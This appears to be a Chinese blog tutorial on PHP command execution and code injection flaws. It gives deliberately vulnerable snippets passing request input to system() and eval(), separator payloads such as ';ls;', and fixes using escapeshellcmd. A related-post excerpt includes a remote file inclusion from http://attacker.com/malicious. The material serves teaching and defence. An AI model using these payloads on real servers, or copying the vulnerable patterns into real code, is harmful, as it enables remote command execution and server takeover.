php system漏洞,命令执行漏洞

最新推荐文章于 2023-09-21 09:11:23 发布
最新推荐文章于 2023-09-21 09:11:23 发布
阅读量1k 收藏 1
点赞数
文章标签: php system漏洞

命令执行

应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、

passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令

拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。

利用条件

应用调用执行系统命令的函数

将用户输入作为系统命令的参数拼接到了命令行中

没有对用户输入进行过滤或过滤不严

漏洞分类

代码层过滤不严

商业应用的一些核心代码封装在二进制文件中,在web应用中通过system函数来调用:

system("/bin/program --arg $arg");

系统的漏洞造成命令注入

bash破壳漏洞(CVE-2014-6271)

调用的第三方组件存在代码执行漏洞

如WordPress中用来处理图片的ImageMagick组件

JAVA中的命令执行漏洞(struts2/ElasticsearchGroovy等)

ThinkPHP命令执行

漏洞危害

继承Web服务程序的权限去执行系统命令或读写文件

反弹shell

控制整个网站甚至控制服务器

进一步内网渗透

等等

漏洞可能代码(以system为例)

1. system("$arg"); //直接输入即可

2. system("/bin/prog $arg"); //直接输入;ls

3. system("/bin/prog -p $arg"); //和2一样

4. system("/bin/prog --p=\"$arg\""); //可以输入";ls;"

5. system("/bin/prog --p='$arg'"); //可以输入';ls;'

在Linux上,上面的;也可以用|、||代替

;前面的执行完执行后面的

|是管道符,显示后面的执行结果

||当前面的执行出错时执行后面的

在Windows上,不能用;可以用&、&&、|、||代替

&前面的语句为假则直接执行后面的

&&前面的语句为假则直接出错,后面的也不执行

|直接执行后面的语句

||前面出错执行后面的

漏洞利用

示例一

$arg = $_GET['cmd'];

if ($arg) {

system("$arg");

}

?>

![command_execution1.png](http://upload-images.jianshu.io/upload_images/2461408-c5fd85bd2c9a1b61.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

* 示例二

> ```php

$arg = $_GET['cmd'];

if ($arg) {

system("ping -c 3 $arg");

}

1e706f13b088

command_execution2.png

示例三

$arg = $_GET['cmd'];

if ($arg) {

system("ls -al "$arg"");

}

![command_execution3.png](http://upload-images.jianshu.io/upload_images/2461408-d33aa1fbbe776039.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)

注:若引号被转义,则可以用\`id\`来执行

* 示例四

> ```php

$arg = $_GET['cmd'];

if ($arg) {

system("ls -al '$arg'");

}

1e706f13b088

command_execution4.png

其他

代码执行:

在cmd.php中的代码如下:

eval($_REQUEST['code']);

?>

提交http://localhost/cmd.php?code=phpinfo() 后就会执行phpinfo()

动态函数调用

在cmd.php中的代码如下:

$fun = $_GET['fun'];

$par = $_GET['par'];

$fun($par);

?>

提交http://localhost/cmd.php?fun=system&par=net user,

最终执行的是system("net user")

漏洞修复

尽量少用执行命令的函数或者直接禁用

参数值尽量使用引号包括

在使用动态函数之前,确保使用的函数是指定的函数之一

在进入执行命令的函数/方法之前,对参数进行过滤,对敏感字符进行转义

$arg = $_GET['cmd'];

// $arg = addslashes($arg);

$arg = escapeshellcmd($arg); //拼接前就处理

if ($arg) {

system("ls -al '$arg'");

}

?>

英甜慧子
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
php中使用exec,system等函数调用系统命令的方法(不建议使用,可导致安全问题)
12-18
php的内置函数exec,system都可以调用系统命令(shell命令),当然还有passthru,escapeshellcmd等函数。 在很多时候利用php的exec,system等函数调用系统命令可以帮助我们更好更快的完成工作。比如前二天笔者在批量处理.rar文件时exec就帮我了大忙了。 今天整理一下常用的调用系统函数发出来和大家分享经验。 注意:要想使用这二个函数php.ini中的安全模式必须关闭,要不然为了安全起见php是不让调用系统命令的。 先看一下php手册对这二个函数的解释:   exec — 执行外部程式   语法 : string exec ( string comman
PHP的system函数
hello PHP的博客
12-20 9920
PHP代码如下: <?php $v = system('netstat -tnlp',$shell_return); var_dump($shell_return); var_dump($v); 执行结果: Active Internet connections (only servers) Proto Recv-Q Send-Q Local Address ...
命令注入漏洞(Command Injection)
qq_52263650的博客
03-15 673
命令注入漏洞(Command Injection)
命令执行漏洞学习
weixin_47306547的博客
09-14 1999
目录 命令执行漏洞简介 命令执行漏洞成因 命令执行漏洞危害 PHP中可以调用外部程序常见函数 1)system() 2) passthru() 3) exec() 4)shell_exec() 5)执行运算符(反引号 `) 6)popen() 7) proc_open() 命令执行漏洞简介 应用程序有时需要调用一些执行系统命令的函数,如在php中,使用system、exec、shell_exec\passthru、popen、proc_popen等函数可以执行系统命令。当黑客.
PHP面试题82】system和exec是用来做什么的?有什么区别
黑夜开发者的博客
08-22 1026
PHP面试专区。做全网最全最有营养的PHP面试大全。在PHP中,system()和exec()是用来执行外部程序或命令的函数。这两个函数的作用基本相同,都可以执行系统命令,但在使用方式和返回值上有一些差别。本文对PHP中的system()和exec()函数进行了详细介绍,并给出了使用示例和安全性考虑。希望能帮助读者理解这两个函数的作用和使用方式,并正确处理命令的输出结果,确保系统安全性。
详解php命令注入攻击
01-20
这次实验内容为了解php命令注入攻击的过程,掌握思路。 命令注入攻击 ...首先是因为应用需要调用一些执行系统命令的函数,比如上面说的php中的system等函数。其次,当用户能够控制这些函数中的参数,就可
PHP COM组件调用绕过安全模式执行任意文件漏洞
03-03
Windows平台下的PHP脚本平台存在一个安全漏洞,使得PHP设置即使在安全模式下(safe_mode),仍旧允许攻击者使用COM()函数来创建系统组件来执行任意命令漏洞出现的原因是由于在安全模式下的PHP平台虽然system()...
Codeigniter利用加密Key(密钥)的对象注入漏洞
01-30
今天,我决定来分析一下Codeigniter的PHP对象注入漏洞。我在接下来的叙述中会把重点放在Codeigniter的Session会话机制上。所有我将会分析的method方法都在CodeIgniter/system/libraries/Session.php文件里。我在本...
鬼客漏洞扫描器.rar
10-14
cgi-bin/System/Userlogin.asp manage/ manager/ cms/ infos_admin/ manager/ndex.asp sxadmin/index.asp fpv_admin/admin.asp control/ guanli/denglu/ houtai/ administrator/ admin_guanli/ logn/ ewebeditor/...
PHP执行系统命令的4个方法 : system , shell_exec , exec , passthru
刘宇(LY)个人笔记
11-05 9650
通过执行系统命令,我们可以调用系统的一些功能,甚至能与其他语言进行交互。 1 system() : system — 执行外部程序(命令行),并且显示输出 这个函数会将结果直接进行输出 (注意:是直接输出区别于返回值,因为这个,我一般不用它),命令成功后返回输出的最后一行,失败返回FALSE 2 shell_exec(): shell_exec — 通过 shell 环境执行命令 ( 这就意味着这...
关于system函数的安全性漏洞
weixin_30446613的博客
05-09 1187
当以一个普通用户去执行 设置-用户ID 为root的程序时,如果再次用了system函数时,被system函数所执行的那个程序具有 有效-用户ID 为root的风险(虽然真实用户还是普通用户),这也是一个漏洞。 设置用户ID 程序绝对不应该调用system函数。 因为fork出来的子进程继承了父进程的 有效-用户ID,而父进程的有效-用户ID会因为程序的执行而变成设置-用户ID,...
php system()
热门推荐
刘阳龙Herman的专栏
09-14 1万+
<br />php函数system详解:<br />执行外部程序并显示输出资料。 <br />system语法: string system(string command, int [return_var]); <br />system返回值: 字符串 <br />函数种类: 操作系统与环境 <br /> <br />system内容说明 <br />本函数就像是 C 语中的函数 system(),用来执行指令,并输出结果。若是 return_var 参数存在,则执行 command 之后的状态会填入 re
php system函数用法,system函数如何使用?总结system函数实例用法
weixin_29982199的博客
03-20 4526
这篇文章主要简单分析了linux下system函数,具有一定的参考价值,感兴趣的小伙伴们可以参考一下简单分析了linux下system函数的相关内容,具体内容如下intlibc_system (const char *line){if (line == NULL)/* Check that we have a command processor available. It mightnot be ...
命令执行漏洞
sjp_1996的博客
04-26 359
命令执行漏洞的原理: 应用程序有时会调用一些执行系统命令的函数,例如在PHP中,使用函数system、exec、shell_exec、passthru、popen、proc_popon等,可以执行系统命令,当黑客能控制函数中的参数时,就可以将系统命令拼接到正常的命令中,从而造成命令执行攻击; DVWA实验 在操作系统中, & 、&& 、| 、 || 都可以作为命令连接符使用,用户通过浏览器提交执行命令,由于服务器端没有针对执行函数做过滤,导致在没有指定绝对路径的情况下就执行
PHP面试题60】system和exec是用来做什么的?有什么区别
GitHub质检员
09-21 81
PHP面试专区。做全网最全最有营养的PHP面试大全。计划将全覆盖PHP开发领域所有的面试题,对标资深工程师/架构师序列,欢迎大家提前关注锁定。在PHP中,system()和exec()是用来执行外部程序或命令的函数。这两个函数的作用基本相同,都可以执行系统命令,但在使用方式和返回值上有一些差别。本文对PHP中的system()和exec()函数进行了详细介绍,并给出了使用示例和安全性考虑。希望能帮助读者理解这两个函数的作用和使用方式,并正确处理命令的输出结果,确保系统安全性。
【ctfshow】PHP特性2
qq_61109509的博客
02-20 807
目录 web100 web101 web102 web103 web104 web105 web106 web107 web108 web109 web110 web100 include("ctfshow.php"); //flag in class ctfshow; $ctfshow = new ctfshow(); $v1=$_GET['v1']; $v2=$_GET['v2']; $v3=$_GET['v3']; $v0=is_numeric($...
php system 命令,在PHP项目中利用system函数执行shell命令
weixin_34582773的博客
03-09 1507
摘要:在php项目开发中,如果能够在项目内执行shell命令,将可以实现更多的功能;此外,如果可以用具有同php相同功能的shell命令来替代,也可以提升项目的性能和效率。而php的system函数就可以实现在php执行shell命令。 在php项目开发中,如果能够在项目内执行shell命令,将可以实现更多的功能;此外,如果可以用具有同php相同功能的shell命令来替代,也可以提升项目的...
PHP代码注入详解
Zeker62的博客
08-16 4672
PHP代码注入的原理和解析 PHP代码注入靠的是RCE,即远程代码执行。 指应用程序过滤不严,hacker可以将代码注入到服务器进行远程的执行。 危害和SSRF相似,通过这个漏洞可以操控服务器的动作。 最典型的就是一句话木马。 PHP代码漏洞注入的两个要素: 程序中含有可执行PHP代码函数 传入第一点的参数,客户端可控,直接修改或者影响 下面将对PHP相关函数和语句以及注入方法进行解释 eval() eval()函数在很多语言中都有,比如Python、PHP。 eval函数的作用是将字符串作为PHP
文件包含漏洞执行命令漏洞
最新发布
12-01
文件包含漏洞执行命令漏洞是常见的Web安全漏洞,以下是它们的介绍和演示: 文件包含漏洞: 文件包含漏洞是指在Web应用程序中,当用户可以控制文件名或文件路径时,攻击者可以通过构造特殊的文件名或路径,使应用程序包含攻击者指定的文件,从而导致攻击者可以执行任意代码。这种漏洞被称为远程文件包含漏洞,如果攻击者能够成功利用该漏洞,就可以直接执行任意命令。 演示: 假设存在以下代码: ```php <?php $file = $_GET['file']; include($file); ?> ``` 攻击者可以通过构造以下URL来利用该漏洞: ``` http://example.com/index.php?file=http://attacker.com/malicious ``` 这样,攻击者就可以将远程服务器上的恶意代码包含到应用程序中,从而执行任意命令执行命令漏洞执行命令漏洞是指在Web应用程序中,当用户可以控制应用程序执行命令时,攻击者可以通过构造特殊的命令参数,使应用程序执行攻击者指定的恶意命令,从而导致攻击者可以执行任意代码。 演示: 假设存在以下代码: ```php <?php $cmd = $_GET['cmd']; system($cmd); ?> ``` 攻击者可以通过构造以下URL来利用该漏洞: ``` http://example.com/index.php?cmd=ls%20-la ``` 这样,攻击者就可以执行任意命令,例如列出服务器上的文件列表。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值